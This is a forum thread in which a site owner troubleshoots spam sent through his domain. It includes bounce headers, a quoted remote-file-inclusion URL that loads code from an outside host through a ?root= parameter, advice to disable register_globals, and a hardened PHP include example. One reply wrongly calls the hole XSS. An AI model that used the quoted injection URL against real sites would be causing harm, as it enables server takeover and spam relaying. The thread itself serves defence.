I had my account suspended many times for sending spam which I do not send. And I need to find out how to protect my domains. This is one of the many returned spams to my mailbox and its header:

Return-path: <>
Envelope-to: webmaste@webmaster-money.org
Delivery-date: Thu, 02 Sep 2010 08:48:21 -0400
Received: from mail by dex178.exmasters.com with local (Exim 4.67)
    id 1Or9DJ-000114-KJ
    for webmaste@webmaster-money.org; Thu, 02 Sep 2010 08:48:21 -0400
X-Failed-Recipients: crantok1@hotmail.com
Auto-Submitted: auto-replied
From: Mail Delivery System
To: webmaste@webmaster-money.org
Subject: Mail delivery failed: returning message to sender
Message-Id:
Date: Thu, 02 Sep 2010 08:48:21 -0400

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:

  crantok1@hotmail.com
    SMTP error from remote mail server after MAIL FROM: SIZE=4262:
    host mx3.hotmail.com [65.54.188.110]: 550 SC-001 Mail rejected by Windows Live Hotmail for policy reasons. Reasons for rejection may be related to content with spam-like characteristics or IP/domain reputation problems. If you are not an email/network admin please contact your E-mail/Internet Service Provider for help. Email/network admins, please visit http://postmaster.live.com for email delivery information and support

------ This is a copy of the message, including all the headers. ------

Return-path:
Received: from apache by dex178.exmasters.com with local (Exim 4.67) (envelope-from )
    id 1OqsVm-0007Cu-QF
    for crantok1@hotmail.com; Wed, 01 Sep 2010 14:58:18 -0400
To: crantok1@hotmail.com
Subject: This is Important , Please Get Back To Me
X-PHP-Script: www.webmaster-money.org/index.php for 82.128.80.42
From: New Zealand Oil and Gas
Reply-To: chris_roberta@hotmail.co.nz
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Wed, 01 Sep 2010 14:58:18 -0400

And I think this is also somehow connected to the problem:

http://www.webmaster-money.org/index.php?root=http://sports-wear.com.my/likchin/images/tst.gif???

open it also with those question marks...

How can I protect myself? Some htaccess will help or some server settings? I need to use that domain for sending mails also so stopping all mail functions is not a solution.
There are a lot of ways spam can be sent from your domain. Go through the software on your site - delete old programs you no longer use. If you use any old php formmail programs upgrade them to "tectite php formmail" - very secure and updated regularly. If you have any custom scripts that send mail either get rid of them or have them updated to be secure. Check for unknown scripts or programs that may have been uploaded by an intruder - delete those and try to ascertain and plug the means of intrusion. While you're at it check your database content for anything unusual that might show signs of mysql injection having taken place. In other words.. you probably want to hire someone very knowledgeable to have a look at things for you. Judging from the code you mention and from this "X-PHP-Script: www dot webmaster- money dot org index php" - the problem you're mentioning now (there could be others) is definitely coming from your index file. That begs me to ask are you still running with register globals enabled? If so turn it off. If the index php script has a variable $root - be sure it is set properly so that it can't be overwritten from the url string ?root= being applied to your site. (even though turning off register globals should prevent this it's still a good idea to properly assign and check variables to be sure someone hasn't poisoned the data in order to use your program for something you didn't intend) Good luck.
Appears your site may have an XSS exploit. You will want to see if there are updates for the web application software you are using. See http://en.wikipedia.org/wiki/Cross-site_scripting for more details on XSS exploits.
I found a possible problem already... thank you for your input... I used include "$root/xxx.php" and this made it somehow possible... also my host disallowed opening/including external files. So now it should be working fine. Now I am checking if I get bounced mails.
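The include pattern from the post above beside a hardened form, as an added example that is not the poster's code: the page names, the `$pages` map and `resolve_page()` are hypothetical, and PHP 7 or later is assumed.

```php
<?php
// Added example; the page files and the $pages map are hypothetical.

// BEFORE (the pattern described in the thread). On an old PHP with
// register_globals on, ?root=http://other-host/x.gif?? overwrites $root,
// and PHP fetches and runs the remote file when URL includes are allowed:
//
//     include "$root/xxx.php";
//
// Server side, keep allow_url_include = Off (and register_globals = Off
// on PHP versions that still have it).

// AFTER: the include base is fixed in code and never read from the request.
define('APP_ROOT', __DIR__);

// The only request-controlled value is a key looked up in a fixed map.
$pages = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(array $pages, $requested): string
{
    // Non-string input (e.g. ?page[]=x) or an unknown key falls back to 'home'.
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        $requested = 'home';
    }
    // realpath() returns false for a missing file and resolves ../ and
    // symlinks, so the result can be checked against APP_ROOT.
    $path = realpath(APP_ROOT . '/' . $pages[$requested]);
    if ($path === false || strpos($path, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('Not found');
    }
    return $path;
}

// Record requests that still carry the old parameter so probing shows up
// in the error log; the attacker-supplied value itself is not written.
if (isset($_GET['root'])) {
    error_log('Ignored root= parameter from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
}

include resolve_page($pages, $_GET['page'] ?? 'home');
```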
That's a big can of worms, good they're turning that off. Success? Most spam blacklists will release you automatically from the list 24-48 hours after they've stopped seeing spam come from your machine. Some are a little stickier so there may be the odd person out there who still won't receive your messages for a while longer. Glad to hear things are getting figured out.